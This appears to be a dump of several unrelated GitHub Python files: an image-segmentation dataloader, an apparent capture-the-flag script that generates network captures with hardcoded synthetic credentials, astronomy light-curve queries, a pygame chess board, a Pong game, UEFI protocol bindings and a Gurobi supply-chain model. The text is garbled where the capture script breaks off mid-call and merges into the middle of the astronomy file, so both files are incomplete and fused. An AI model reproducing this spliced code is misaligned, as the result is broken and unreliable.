self.num_classes))\n\n\n # sample = {'image': _img, 'label': _target, 'seg_labels': seg_labels}\n sample = {'image': _img, 'label': _target}\n\n\n\n if self.split == \"train\":\n # print('train')\n traindata = self.transform_tr(sample)\n\n # print(type(traindata))\n\n # target_tensor = traindata['label']\n # # print(type(target_tensor), target_tensor.shape)\n #\n # target_numpy = target_tensor.numpy().astype(np.uint8)\n # #print(np.unique(target_numpy))\n # print(target_tensor.shape,traindata['image'].shape)\n # print(target_numpy.reshape([-1]).shape)\n # target_numpy_ = np.eye(self.num_classes + 1)[target_numpy.reshape([-1])]\n # target_numpy_ = target_numpy_.reshape(target_tensor.shape[0], target_tensor.shape[1], self.num_classes + 1)\n #\n # seg_labels = np.array(target_numpy_).astype(np.float32)\n # seg_labels = torch.from_numpy(seg_labels).float()\n seg_labels = []\n traindata['seg_labels'] = seg_labels\n\n return traindata\n elif self.split == 'val':\n # print('val')\n valdata = self.transform_val(sample)\n #target_tensor = valdata['label']\n # target_numpy = target_tensor.numpy().astype(np.uint8)\n # target_numpy_ = np.eye(self.num_classes + 1)[target_numpy.reshape([-1])]\n # target_numpy_ = target_numpy_.reshape(target_tensor.shape[0], target_tensor.shape[1], self.num_classes + 1)\n target_numpy_ = [] #one-hot 编码 只\n\n valdata['seg_labels'] = target_numpy_\n return valdata\n elif self.split == 'test':\n # print('in return')\n #return self.transform_val(sample)\n valdata = self.transform_val(sample)\n # target_tensor = valdata['label']\n # target_numpy = target_tensor.numpy().astype(np.uint8)\n # target_numpy_ = np.eye(self.num_classes + 1)[target_numpy.reshape([-1])]\n # target_numpy_ = target_numpy_.reshape(target_tensor.shape[0], target_tensor.shape[1], self.num_classes + 1)\n target_numpy_ = []\n valdata['seg_labels'] = target_numpy_\n # valdata['name'] = str(self.images[index]).split('\\\\')[3].split('.')[0]\n # valdata['h'] = _h\n # valdata['w'] = _w\n return valdata\n\n def _make_img_gt_point_pair(self, index):\n _img = Image.open(self.images[index]).convert('RGB')\n _target = Image.open(self.masks[index])\n _h = _img.size[1]\n _w = _img.size[0]\n return _img, _target, _h, _w\n\n def transform_tr(self, sample):\n composed_transforms = transforms.Compose([\n tr.RandomHorizontalFlip(),\n tr.RandomScaleCrop(base_size=self.config['image']['base_size'],\n crop_size=self.config['image']['crop_size']),\n tr.RandomGaussianBlur(),\n tr.Normalize(mean=(0.485, 0.456, 0.406), std=(0.229, 0.224, 0.225)),\n tr.ToTensor()])\n\n return composed_transforms(sample)\n\n def transform_val(self, sample):\n\n composed_transforms = transforms.Compose([\n # tr.FixScaleCrop(crop_size=crop_size),\n tr.FixScaleCrop(crop_size=self.config['image']['crop_size']),\n # tr.FixScaleCrop(crop_size=513),\n tr.Normalize(mean=(0.485, 0.456, 0.406), std=(0.229, 0.224, 0.225)),\n tr.ToTensor()])\n\n return composed_transforms(sample)\n\n @staticmethod\n def preprocess(sample, crop_size=513):\n\n composed_transforms = transforms.Compose([\n tr.FixScaleCrop(crop_size=crop_size),\n tr.Normalize(mean=(0.485, 0.456, 0.406), std=(0.229, 0.224, 0.225)),\n tr.ToTensor()])\n\n return composed_transforms(sample)\n\n #gc自己写的不裁剪\n @staticmethod\n def preprocess_no_crop(sample):\n\n composed_transforms = transforms.Compose([\n # tr.FixScaleCrop(crop_size=crop_size),\n tr.Normalize(mean=(0.485, 0.456, 0.406), std=(0.229, 0.224, 0.225)),\n tr.ToTensor()\n ])\n\n return composed_transforms(sample)\n\n def __str__(self):\n return 'DeepFashion2(split=' + str(self.split) + ')'\n\n def __len__(self):\n return len(self.images)\n\n\n\n\nif __name__ == '__main__':\n import yaml\n #path = '../configs/seg_hrnet_ocr_w48_cls59_520x520_sgd_lr1e-3_wd1e-4_bs_16_epoch200.yaml'\n #path = '../configs/config_hrnet_ocr.yml'\n path = '../configs/config_hrnet_ocr.yml'\n with open(path) as f:\n config = yaml.load(f, Loader=yaml.FullLoader)\n #print(config)\n dataset = VOCSegmentation(config,split='train')\n data = DataLoader(dataset,4,shuffle=True)\n #print(dataset.__len__())\n #print(len(data))\n\n for i,samlpe in enumerate(data):\n #print(samlpe)\n\n\n print(samlpe['label'].shape)\n if i>5:\n break\n\n\n# def get_dataloader(mode=True, batch_size=4, shape=(512, 512)):\n# \"\"\"\n# 获取数据集加载\n# :param mode:\n# :return:\n# \"\"\"\n# if mode:\n# # 2. 实例化,准备dataloader\n# dataset = VOCSegmentation(voc_root=r\"E:\\note\\cv\\data\\VOC_Train\",\n# shape=shape,\n# )\n# dataloader = DataLoader(dataset=dataset, batch_size=batch_size, shuffle=True)\n# else:\n# dataset = VOCSegmentation(voc_root=r\"E:\\note\\cv\\data\\VOC_Train\",\n# shape=shape,\n# txt_name=\"val.txt\",\n# )\n# dataloader = DataLoader(dataset=dataset, batch_size=batch_size, shuffle=True)\n# return dataloader\n#\n#\n# cm = np.array(colormap).astype('uint8')\n#\n#\n# def show_image(tensor):\n# plt.figure()\n# image = tensor.numpy().transpose(1, 2, 0)\n# plt.imshow(image)\n# plt.show()\n#\n#\n# def show_label(label):\n# print(label.shape)\n# plt.figure()\n# labels = cm[label]\n# plt.imshow(labels)\n# plt.show()\n#\n#\n# def show_label_2(label):\n# plt.figure()\n# # print(np.unique(label.numpy()))\n# label = label.numpy().astype('uint8')\n# label[label == 255] = 0\n# label = colormap[label]\n# print(label.shape)\n# plt.imshow(label)\n# plt.show()\n#\n#\n# if __name__ == '__main__':\n# train_dataloader = get_dataloader(True, batch_size=2)\n#\n# for images, labels in train_dataloader:\n# show_image(images[0])\n# show_label_2(labels[0])\n# break\n\n","repo_name":"ZhongHHX/FMNet","sub_path":"data_generators/voc2012.py","file_name":"voc2012.py","file_ext":"py","file_size_in_byte":10753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"20824980636","text":"#!/usr/bin/env python3\nfrom progressbar import progressbar\nimport random\nimport rsa\nimport secrets\nimport struct\n\nfrom scapy.all import wrpcap\n\nfrom AuthServer import AuthServer\nfrom Device import Device\nfrom SecureTransport import SecureTransport, xor\nfrom TCPStream import TCPStream\nfrom TCPStreamTransport import TCPStreamTransport\nfrom Token import generate_token\n\nusers = \"\"\"yen\nbarney\ndion\nsavanna\nbritt\nangelina\nranae\nargelia\nyesenia\nmark\njone\njosue\nsharri\njohnny\ncristi\nscott\nfausto\nyasmine\nscarlett\nmyesha\nlona\nronald\nkatheleen\naudrea\nrobert\neloy\nayana\nmolly\nneal\nedith\"\"\"\n\npasswords = \"\"\"DyUhEFCAKz9NBsMn\nupJHwzmFyBR2NwDd\nKvb9JcWnPntUv5vW\ncmN6GpNe7yajpWKE\n3V3P9FDEQA35Zuzk\nMc7uZjHUyZFFE257\nLN7MJzDqzXJzHJj2\nQhrx8RaxZr7uk68P\n2fWMZp8L7p8P287t\nprxuys3J8BKxhwAa\nYkLR87KZxRgfSgL7\nNSEppWcrgKkRWfNP\nAFQpcJuUmnspBBrx\nEQYB9Hzauup5ZtNE\ncDgmhFxkNQAuWm3a\nMRKyEddteDTesaz9\nKVpR5hsvuSTSj2tq\ndzheJgptdeHmP7Yb\nqFJke4UZpmaSaLz5\nkMv3h5pEzXAYykpD\nLLGLRPLpREsbVD28\nGGS8vM5VMxa4zArD\nr5DuCDBbC7GUpuGm\nZJ77bbVQX8XjYpSz\nkVGVkukgjufKKJ53\nGhzRYvhh9de4vpyQ\nez89Ge2BtatHCjUL\nAfZBdrGXqEBq7v6R\ncgBudzMNUuJj9UZb\nbEGyseZHm5L9YwAj\"\"\"\n\nusers = users.split(\"\\n\")\npasswords = passwords.split(\"\\n\")\n\nclients = []\n\nfor c in range(1, 5):\n for d in range(1, 255):\n clients.append((c, d))\n\nrandom.shuffle(clients)\n\nwith open(\"sign_key.pem\", \"rb\") as f:\n token_sign_key = rsa.PrivateKey.load_pkcs1(f.read())\n\nserver_device = Device(\"10.0.0.1\")\nkey = secrets.token_bytes(AuthServer.MAX_MESSAGE)\npackets = []\n\nfor client in progressbar(clients):\n address = \"10.0.%d.%d\" % (client[0], client[1])\n client_secret = client[1]\n client_device = Device(address)\n client_key = xor(key, bytes([client_secret]))\n\n if clients.index(client) == 784:\n user = \"alexander\"\n password = \"UH3nSzXRd9MHrxp5\"\n else:\n user = random.choice(users)\n password = passwords[users.index(user)]\n\n stream = TCPStream(client_device, server_device, 3000)\n stream.handshake()\n stream.server_send(struct.pack(\" Select:\n \"\"\"\n Gets the SQL query for the database models for the light curve collection.\n\n :return: The SQL query.\n \"\"\"\n query = super().get_sql_query()\n eclipsing_binary_tic_id_query = TessEclipsingBinaryMetadata.select(TessEclipsingBinaryMetadata.tic_id)\n query = query.where(TessFfiLightCurveMetadata.tic_id.in_(eclipsing_binary_tic_id_query))\n return query\n\n\nclass TessFfiAntiEclipsingBinaryForTransitLightCurveCollection(TessFfiLightCurveCollection):\n \"\"\"\n A class representing the collection of TESS two minute cadence light curves flagged as eclipsing binaries which are\n not a suspected transit.\n \"\"\"\n def __init__(self, dataset_splits: Union[List[int], None] = None,\n magnitude_range: (Union[float, None], Union[float, None]) = (None, None)):\n super().__init__(dataset_splits=dataset_splits, magnitude_range=magnitude_range)\n self.label = 0\n\n def get_sql_query(self) -> Select:\n \"\"\"\n Gets the SQL query for the database models for the light curve collection.\n\n :return: The SQL query.\n \"\"\"\n query = super().get_sql_query()\n transit_tic_id_query = TessTransitMetadata.select(TessTransitMetadata.tic_id).where(\n (TessTransitMetadata.disposition == TransitDisposition.CONFIRMED.value) |\n (TessTransitMetadata.disposition == TransitDisposition.CANDIDATE.value))\n eclipsing_binary_tic_id_query = TessEclipsingBinaryMetadata.select(TessEclipsingBinaryMetadata.tic_id).where(\n TessEclipsingBinaryMetadata.tic_id.not_in(transit_tic_id_query))\n query = query.where(TessFfiLightCurveMetadata.tic_id.in_(eclipsing_binary_tic_id_query))\n return query\n","repo_name":"golmschenk/ramjet","sub_path":"src/ramjet/photometric_database/derived/tess_ffi_eclipsing_binary_light_curve_collection.py","file_name":"tess_ffi_eclipsing_binary_light_curve_collection.py","file_ext":"py","file_size_in_byte":2859,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"51"} +{"seq_id":"37054772713","text":"##################################################\n##################################################\n# The class is for establishing a chess game\n#\n##################################################\n##################################################\nclass Board:\n \n def __init__(self):\n self.board_length = 800\n self.pygame = None\n\n ##################################################\n # Method for draw the chess board\n ##################################################\n def DrawChessBoard(self, board_length = 800):\n \n import pygame\n\n pygame.init()\n\n # Setting up color objects\n Colour = (100,120,10)\n BLACK = (0, 0, 0)\n WHITE = (255, 255, 255)\n\n # Setup a board_length x board_length pixel display with caption\n ChessBoard = pygame.display.set_mode((board_length,board_length))\n ChessBoard.fill(WHITE)\n pygame.display.set_caption(\"CHESS\")\n\n\n # create board squares\n exact_board_length = board_length\n board_length = exact_board_length - (exact_board_length/ (8 + 1))\n square_length = board_length/ (8 + 1)\n square_position1 = square_length\n square_position2 = square_length\n count = 0\n position_names = [\"a\",\"b\",\"c\",\"d\",\"e\",\"f\",\"g\",\"h\"]\n \n ####################\n # draw the frame of the board\n pygame.draw.rect(ChessBoard, BLACK, \n [square_length, square_length, \n board_length - square_length, board_length - square_length], width = 4, \n border_radius=2,border_top_left_radius=-1, border_top_right_radius=-1,\n border_bottom_left_radius=-1, border_bottom_right_radius=-1)\n \n ########################################\n #draw the position name and the squares of the chessboard\n while square_position1 < (board_length):\n from pygame import font\n square_position2 = square_length\n if count%2 == 0:\n square_position2 = square_length*2\n count = count + 1\n \n ####################\n ### draw the position name\n font = pygame.font.SysFont(\"comicsansms\", int(square_length/4))\n text1 = font.render(str(count), True, BLACK)\n text2 = font.render(position_names[count-1], True, BLACK)\n ChessBoard.blit(text1,(0 + square_length/4 , square_position1 + square_length/4))\n pygame.display.flip()\n ChessBoard.blit(text2,(square_position1 + square_length/4 , 0 + square_length/4))\n \n ####################\n ### draw the squares of the chessboard\n while square_position2 < (board_length):\n pygame.draw.rect(ChessBoard, BLACK, \n [square_position1, square_position2, square_length, square_length], \n border_radius=2,border_top_left_radius=-1, border_top_right_radius=-1,\n border_bottom_left_radius=-1, border_bottom_right_radius=-1)\n square_position2 = square_position2 + square_length*2\n ####################\n square_position1 = square_position1 + square_length\n self.pygame = pygame\n \n ##################################################\n # Draw Chess Pieces\n ##################################################\n def DrawChessPieces(self ):\n pygame = self.pygame\n #TODO\n \n\n \n ##################################################\n # Method for run the established pygame\n ##################################################\n def RunGame(self):\n from pygame.locals import QUIT\n import sys\n \n pygame = self.pygame\n # Assign FPS a value\n fps = 30\n FramePerSec = pygame.time.Clock()\n \n # Beginning Game Loop\n while True:\n pygame.display.update()\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n\n FramePerSec.tick(fps)","repo_name":"MelikeSila/chess","sub_path":"ChessEquipment.py","file_name":"ChessEquipment.py","file_ext":"py","file_size_in_byte":4241,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"19513928389","text":"import math\nimport time\nimport sys\nimport os\n\nimport PIL.Image\n\nimport numpy as np\n\nsys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\n\nimport jupylet.color\n\nfrom jupylet.app import App\nfrom jupylet.state import State\nfrom jupylet.label import Label\nfrom jupylet.sprite import Sprite\n\nfrom jupylet.audio.sample import Sample\n\nimport moderngl_window.timers.clock as _clock\n\n\napp = App()\n\n\nbackground = '#3e32a2'\nforeground = '#7c71da'\n\n\na0 = np.ones((32, 32)) * 255\na1 = np.ones((128, 16)) * 255\na2 = np.ones((app.height * 9 // 10, app.width * 9 // 10, 3)) * 255\n\nball = Sprite(a0, y=app.height/2, x=app.width/2)\n\npadl = Sprite(a1, y=app.height/2, x=48)\npadr = Sprite(a1, y=app.height/2, x=app.width-48)\n\nfield = Sprite(a2, y=app.height/2, x=app.width/2, color=background) \n\npong_sound = Sample('sounds/pong-blip.wav', amp=0.2).load()\n\n\nscorel = Label(\n '0', font_size=42, color=foreground, \n x=64, y=app.height/2, \n anchor_y='center', anchor_x='left',\n font_path='fonts/PetMe64.ttf'\n)\n\nscorer = Label(\n '0', font_size=42, color=foreground, \n x=app.width-64, y=app.height/2, \n anchor_y='center', anchor_x='right',\n font_path='fonts/PetMe64.ttf'\n)\n\n\n@app.event\ndef render(ct, dt):\n \n app.window.clear(color=foreground)\n \n field.draw()\n \n scorel.draw()\n scorer.draw()\n \n ball.draw()\n padl.draw()\n padr.draw()\n\n\nstate = State(\n \n sl = 0,\n sr = 0,\n \n bvx = 192,\n bvy = 192,\n \n vyl = 0,\n pyl = app.height/2,\n\n vyr = 0,\n pyr = app.height/2,\n\n left = False,\n right = False,\n\n key_a = False,\n key_d = False,\n)\n\n\n@app.event\ndef key_event(key, action, modifiers):\n \n keys = app.window.keys\n \n if action == keys.ACTION_PRESS:\n \n if key == keys.LEFT:\n state.left = True\n\n if key == keys.RIGHT:\n state.right = True\n\n if key == keys.A:\n state.key_a = True\n\n if key == keys.D:\n state.key_d = True\n\n if action == keys.ACTION_RELEASE:\n\n \n if key == keys.LEFT:\n state.left = False\n\n if key == keys.RIGHT:\n state.right = False\n\n if key == keys.A:\n state.key_a = False\n\n if key == keys.D:\n state.key_d = False\n\n\n@app.run_me_every(1/120)\ndef update_pads(ct, dt):\n \n if state.right:\n state.pyr = min(app.height, state.pyr + dt * 512)\n \n if state.left:\n state.pyr = max(0, state.pyr - dt * 512)\n \n if state.key_a:\n state.pyl = min(app.height, state.pyl + dt * 512)\n \n if state.key_d:\n state.pyl = max(0, state.pyl - dt * 512)\n \n ayl = 200 * (state.pyl - padl.y)\n ayr = 200 * (state.pyr - padr.y)\n\n state.vyl = state.vyl * 0.9 + (ayl * dt)\n state.vyr = state.vyr * 0.9 + (ayr * dt)\n \n padl.y += state.vyl * dt\n padr.y += state.vyr * dt\n \n padr.clip_position(app.width, app.height)\n padl.clip_position(app.width, app.height)\n\n\n@app.run_me_every(1/60)\ndef update_ball(ct, dt):\n \n bs0 = state.bvx ** 2 + state.bvy ** 2\n \n ball.angle += 200 * dt\n \n ball.x += state.bvx * dt\n ball.y += state.bvy * dt\n \n if ball.top >= app.height:\n pong_sound.play(pan=2*max(.25, min(.75, ball.x / app.width))-1)\n ball.y -= ball.top - app.height\n state.bvy = -state.bvy\n \n if ball.bottom <= 0:\n pong_sound.play(pan=2*max(.25, min(.75, ball.x / app.width))-1)\n ball.y -= ball.bottom\n state.bvy = -state.bvy\n \n if ball.right >= app.width:\n pong_sound.play(pan=2*max(.25, min(.75, ball.x / app.width))-1)\n ball.x -= ball.right - app.width\n \n state.bvx = -192\n state.bvy = 192 * np.sign(state.bvy)\n bs0 = 0\n \n state.sl += 1\n scorel.text = str(state.sl)\n \n if ball.left <= 0:\n pong_sound.play(pan=2*max(.25, min(.75, ball.x / app.width))-1)\n ball.x -= ball.left\n \n state.bvx = 192\n state.bvy = 192 * np.sign(state.bvy)\n bs0 = 0\n \n state.sr += 1\n scorer.text = str(state.sr)\n \n if state.bvx > 0 and ball.top >= padr.bottom and padr.top >= ball.bottom: \n if 0 < ball.right - padr.left < 10:\n pong_sound.play(pan=2*max(.25, min(.75, ball.x / app.width))-1)\n ball.x -= ball.right - padr.left\n state.bvx = -state.bvx\n state.bvy += state.vyr / 2\n \n if state.bvx < 0 and ball.top >= padl.bottom and padl.top >= ball.bottom: \n if 0 < padl.right - ball.left < 10:\n pong_sound.play(pan=2*max(.25, min(.75, ball.x / app.width))-1)\n ball.x += ball.left - padl.right\n state.bvx = -state.bvx\n state.bvy += state.vyl / 2\n \n bs1 = state.bvx ** 2 + state.bvy ** 2\n \n if bs1 < 0.9 * bs0:\n state.bvx = (bs0 - state.bvy ** 2) ** 0.5 * np.sign(state.bvx)\n\n ball.wrap_position(app.width, app.height)\n\n\n@app.run_me()\ndef highlights(ct, dt):\n \n sl0 = state.sl\n sr0 = state.sr\n \n slc = np.array(scorel.color)\n src = np.array(scorer.color)\n \n while True:\n \n ct, dt = yield 1/24\n \n r0 = 0.9 ** (120 * dt)\n \n scorel.color = np.array(scorel.color) * r0 + (1 - r0) * slc\n scorer.color = np.array(scorer.color) * r0 + (1 - r0) * src\n \n if sl0 != state.sl:\n sl0 = state.sl\n scorel.color = 'white'\n\n if sr0 != state.sr:\n sr0 = state.sr\n scorer.color = 'white'\n\n\ndef step(player0=[0, 0, 0, 0, 0], player1=[0, 0, 0, 0, 0], n=1):\n \n state.key_a, state.key_d = player0[:2]\n \n state.left, state.right = player1[:2]\n \n sl0 = state.sl\n sr0 = state.sr\n \n if app.mode == 'hidden': \n app.step(n)\n \n reward = (state.sl - sl0) - (state.sr - sr0)\n\n return observe(reward)\n\n\ndef observe(reward=0):\n\n return {\n 'screen0': app.observe(),\n 'player0': {'score': state.sl, 'reward': reward},\n 'player1': {'score': state.sr, 'reward': -reward},\n }\n\n\nSTART = 'pong-start.state'\n\n\ndef reset():\n load(START)\n return observe()\n \n \ndef load(path):\n app.load_state(path, state, ball, padl, padr, scorel, scorer)\n return observe()\n \n\ndef save(path=None):\n app.save_state('pong', path, state, ball, padl, padr, scorel, scorer)\n\n\nif __name__ == '__main__':\n app.run()\n\n","repo_name":"nir/jupylet","sub_path":"examples/pong.py","file_name":"pong.py","file_ext":"py","file_size_in_byte":6484,"program_lang":"python","lang":"en","doc_type":"code","stars":208,"dataset":"github-code","pt":"51"} +{"seq_id":"38623726047","text":"from EfiPy2 import *\n\nfrom EfiPy2.MdePkg.Protocol.PciRootBridgeIo import EFI_PCI_ROOT_BRIDGE_IO_PROTOCOL_PCI_ADDRESS\n\ngEfiPciHostBridgeResourceAllocationProtocolGuid = \\\n EFI_GUID (0xCF8034BE, 0x6768, 0x4d8b, (0xB7,0x39,0x7C,0xCE,0x68,0x3A,0x9F,0xBE ))\n\nclass EFI_PCI_HOST_BRIDGE_RESOURCE_ALLOCATION_PROTOCOL (Structure):\n pass\n\nEFI_PCI_HOST_BRIDGE_COMBINE_MEM_PMEM = 1\nEFI_PCI_HOST_BRIDGE_MEM64_DECODE = 2\n\nEFI_RESOURCE_ALLOCATION_STATUS = UINT64\n\nEFI_RESOURCE_SATISFIED = 0x0000000000000000\nEFI_RESOURCE_NOT_SATISFIED = 0xFFFFFFFFFFFFFFFF\n\nEfiPciHostBridgeBeginEnumeration = 0\nEfiPciHostBridgeBeginBusAllocation = 1\nEfiPciHostBridgeEndBusAllocation = 2\nEfiPciHostBridgeBeginResourceAllocation = 3\nEfiPciHostBridgeAllocateResources = 4\nEfiPciHostBridgeSetResources = 5\nEfiPciHostBridgeFreeResources = 6\nEfiPciHostBridgeEndResourceAllocation = 7\nEfiPciHostBridgeEndEnumeration = 8\nEfiMaxPciHostBridgeEnumerationPhase = 9\nEFI_PCI_HOST_BRIDGE_RESOURCE_ALLOCATION_PHASE = ENUM\n\nEfiPciBeforeChildBusEnumeration = 0\nEfiPciBeforeResourceCollection = 1\nEFI_PCI_CONTROLLER_RESOURCE_ALLOCATION_PHASE = ENUM\n\nEFI_PCI_HOST_BRIDGE_RESOURCE_ALLOCATION_PROTOCOL_NOTIFY_PHASE = CFUNCTYPE (\n EFI_STATUS,\n POINTER(EFI_PCI_HOST_BRIDGE_RESOURCE_ALLOCATION_PROTOCOL),# IN *This\n EFI_PCI_HOST_BRIDGE_RESOURCE_ALLOCATION_PHASE # IN Phase\n )\n\nEFI_PCI_HOST_BRIDGE_RESOURCE_ALLOCATION_PROTOCOL_GET_NEXT_ROOT_BRIDGE = CFUNCTYPE (\n EFI_STATUS,\n POINTER(EFI_PCI_HOST_BRIDGE_RESOURCE_ALLOCATION_PROTOCOL), # IN *This\n POINTER(EFI_HANDLE) # IN OUT *RootBridgeHandle\n )\n\nEFI_PCI_HOST_BRIDGE_RESOURCE_ALLOCATION_PROTOCOL_GET_ATTRIBUTES = CFUNCTYPE (\n EFI_STATUS,\n POINTER(EFI_PCI_HOST_BRIDGE_RESOURCE_ALLOCATION_PROTOCOL), # IN *This,\n EFI_HANDLE, # IN RootBridgeHandle,\n POINTER(UINT64) # OUT *Attributes\n )\n\nEFI_PCI_HOST_BRIDGE_RESOURCE_ALLOCATION_PROTOCOL_START_BUS_ENUMERATION = CFUNCTYPE (\n EFI_STATUS,\n POINTER(EFI_PCI_HOST_BRIDGE_RESOURCE_ALLOCATION_PROTOCOL), # IN *This,\n EFI_HANDLE, # IN RootBridgeHandle,\n POINTER(PVOID) # OUT **Configuration\n )\n\nEFI_PCI_HOST_BRIDGE_RESOURCE_ALLOCATION_PROTOCOL_SET_BUS_NUMBERS = CFUNCTYPE (\n EFI_STATUS,\n POINTER(EFI_PCI_HOST_BRIDGE_RESOURCE_ALLOCATION_PROTOCOL), # IN *This,\n EFI_HANDLE, # IN RootBridgeHandle,\n PVOID # IN *Configuration\n )\n\nEFI_PCI_HOST_BRIDGE_RESOURCE_ALLOCATION_PROTOCOL_SUBMIT_RESOURCES = CFUNCTYPE (\n EFI_STATUS,\n POINTER(EFI_PCI_HOST_BRIDGE_RESOURCE_ALLOCATION_PROTOCOL), # IN *This,\n EFI_HANDLE, # IN RootBridgeHandle,\n PVOID # IN *Configuration\n )\n\nEFI_PCI_HOST_BRIDGE_RESOURCE_ALLOCATION_PROTOCOL_GET_PROPOSED_RESOURCES = CFUNCTYPE (\n EFI_STATUS,\n POINTER(EFI_PCI_HOST_BRIDGE_RESOURCE_ALLOCATION_PROTOCOL), # IN *This,\n EFI_HANDLE, # IN RootBridgeHandle,\n POINTER(PVOID) # OUT **Configuration\n )\n\nEFI_PCI_HOST_BRIDGE_RESOURCE_ALLOCATION_PROTOCOL_PREPROCESS_CONTROLLER = CFUNCTYPE (\n EFI_STATUS,\n POINTER(EFI_PCI_HOST_BRIDGE_RESOURCE_ALLOCATION_PROTOCOL), # IN *This,\n EFI_HANDLE, # IN RootBridgeHandle,\n EFI_PCI_ROOT_BRIDGE_IO_PROTOCOL_PCI_ADDRESS, # IN PciAddress,\n EFI_PCI_CONTROLLER_RESOURCE_ALLOCATION_PHASE # IN Phase\n )\n\nEFI_PCI_HOST_BRIDGE_RESOURCE_ALLOCATION_PROTOCOL._fields_ = [\n (\"NotifyPhase\", EFI_PCI_HOST_BRIDGE_RESOURCE_ALLOCATION_PROTOCOL_NOTIFY_PHASE),\n (\"GetNextRootBridge\", EFI_PCI_HOST_BRIDGE_RESOURCE_ALLOCATION_PROTOCOL_GET_NEXT_ROOT_BRIDGE),\n (\"GetAllocAttributes\", EFI_PCI_HOST_BRIDGE_RESOURCE_ALLOCATION_PROTOCOL_GET_ATTRIBUTES),\n (\"StartBusEnumeration\", EFI_PCI_HOST_BRIDGE_RESOURCE_ALLOCATION_PROTOCOL_START_BUS_ENUMERATION),\n (\"SetBusNumbers\", EFI_PCI_HOST_BRIDGE_RESOURCE_ALLOCATION_PROTOCOL_SET_BUS_NUMBERS),\n (\"SubmitResources\", EFI_PCI_HOST_BRIDGE_RESOURCE_ALLOCATION_PROTOCOL_SUBMIT_RESOURCES),\n (\"GetProposedResources\", EFI_PCI_HOST_BRIDGE_RESOURCE_ALLOCATION_PROTOCOL_GET_PROPOSED_RESOURCES),\n (\"PreprocessController\", EFI_PCI_HOST_BRIDGE_RESOURCE_ALLOCATION_PROTOCOL_PREPROCESS_CONTROLLER)\n ]\n\n","repo_name":"EfiPy/EfiPy2","sub_path":"Efi/StdLib/lib/python36.8/EfiPy2/MdePkg/Protocol/PciHostBridgeResourceAllocation.py","file_name":"PciHostBridgeResourceAllocation.py","file_ext":"py","file_size_in_byte":4795,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"28062907139","text":"import math\nimport time\nimport numpy as np\nimport random\nfrom random import randint\nfrom gurobipy import *\nimport pandas as pd\nfrom random import seed\nimport matplotlib.pyplot as plt\nimport itertools\nimport ast\n\n# Read input files\npath = \"/home/dkabe/SC_Resilience/Input_Data/Realistic/\"\np_failure = 0.1\np_running = 1 - p_failure\ninstances = 2\nnum_samples = 200\nProducts = [3,3]\n\nManufacturing_plants = [6, 6]\nDistribution = [4, 4]\nMarket = [29, 29]\nnumScenarios = [192, 192]\n\n# Read and append input files\nf_i = [None]*instances\nf_j = [None]*instances\nvolume = [None]*instances\nManufacturing_costs = [None]*instances\nTransportation_i_j = [None]*instances\nTransportation_j_k = [None]*instances\nCapacities_i = [None]*instances\nCapacities_j = [None]*instances\nlost_sales = [None]*instances\ndemand = [None]*instances\n\nfor instance in range(instances):\n # Cost of Opening\n f_i[instance] = np.loadtxt(path + 'Instance_' + str(instance + 1) + '/OpenMP_' + str(instance + 1) + '.txt')\n f_j[instance] = np.loadtxt(path + 'Instance_' + str(instance + 1) + '/OpenDC_' + str(instance + 1) + '.txt')\n\n # Unit cost of Manufacturing\n Manufacturing_costs[instance] = np.loadtxt(path + 'Instance_' + str(instance + 1) + '/Manufacturing_' + str(instance + 1) + '.txt')\n\n # Transportation Costs\n Transportation_i_j[instance] = np.loadtxt(path + 'Instance_' + str(instance + 1) + '/TransMPDC_' + str(instance + 1) + '.txt').reshape((Products[instance], Manufacturing_plants[instance], Distribution[instance]))\n Transportation_j_k[instance] = np.loadtxt(path + 'Instance_' + str(instance + 1) + '/TransDCMZ_' + str(instance + 1) + '.txt').reshape((Products[instance], Distribution[instance], Market[instance]))\n\n # Plant Capacities\n Capacities_i[instance] = np.loadtxt(path + 'Instance_' + str(instance + 1) + '/CapacitiesMP_' + str(instance + 1) + '.txt')\n Capacities_j[instance] = np.loadtxt(path + 'Instance_' + str(instance + 1) + '/CapacitiesDC_' + str(instance + 1) + '.txt')\n\n # Unit cost of lost sales\n lost_sales[instance] = np.loadtxt(path + 'Instance_' + str(instance + 1) + '/LostSales_' + str(instance + 1) + '.txt').reshape((Market[instance], Products[instance]))\n\n # demand\n demand[instance] = np.loadtxt(path + 'Instance_' + str(instance + 1) + '/Demand_' + str(instance + 1) + '.txt').reshape((numScenarios[instance], Products[instance], Market[instance]))\n\n # volume\n volume[instance] = np.loadtxt(path + 'Instance_' + str(instance + 1) + '/Volume_' + str(instance + 1) + '.txt')\n\nScenarios = []\n\nfor instance in range(instances):\n text_file = open(path + 'Instance_' + str(instance + 1) + '/scen_' + str(instance + 1) + '.txt', \"r\")\n ls = text_file.read().split('\\n')[:-1]\n Scen = list(map(lambda x: ast.literal_eval(x), ls))\n Scenarios.append(Scen)\n\n\n# Initialize model variables\n\nx_i = {} # opening manufacturing plant\nx_j = {} # opening DC\nU_km = {} # quantity lost sales\nQ_im = {} # quantity produced\nY_ijm = {} # shipping i -> j\nZ_jkm = {} # shipping j -> k\nw_s = {} # penalty for not meeting demand above specified rate\n\n# Dictionaries for analysis\nCost_dict = {}\nSummary_dict = {}\n\n# Dictionary to weigh different objectives\nobjWeights = {}\n\n# Dictionary to save values of each objectives\ndic_grbOut = {}\n\ngrbModel = Model()\n\ndef SetGurobiModel(instance, rl, num_Scenarios, Manufacturing_plants, Distribution, Market, Products):\n\n global x_i \n global x_j \n global U_km \n global Q_im \n global Y_ijm \n global Z_jkm \n global w_s \n\n x_i = grbModel.addVars(range(Manufacturing_plants), vtype = GRB.BINARY)\n x_j = grbModel.addVars(range(Distribution), vtype = GRB.BINARY) \n U_km = grbModel.addVars(range(num_Scenarios), range(Market), range(Products), vtype = GRB.CONTINUOUS) \n Q_im = grbModel.addVars(range(num_Scenarios), range(Products), range(Manufacturing_plants), vtype = GRB.CONTINUOUS)\n Y_ijm = grbModel.addVars(range(num_Scenarios), range(Products), range(Manufacturing_plants), range(Distribution), vtype = GRB.CONTINUOUS)\n Z_jkm = grbModel.addVars(range(num_Scenarios), range(Products), 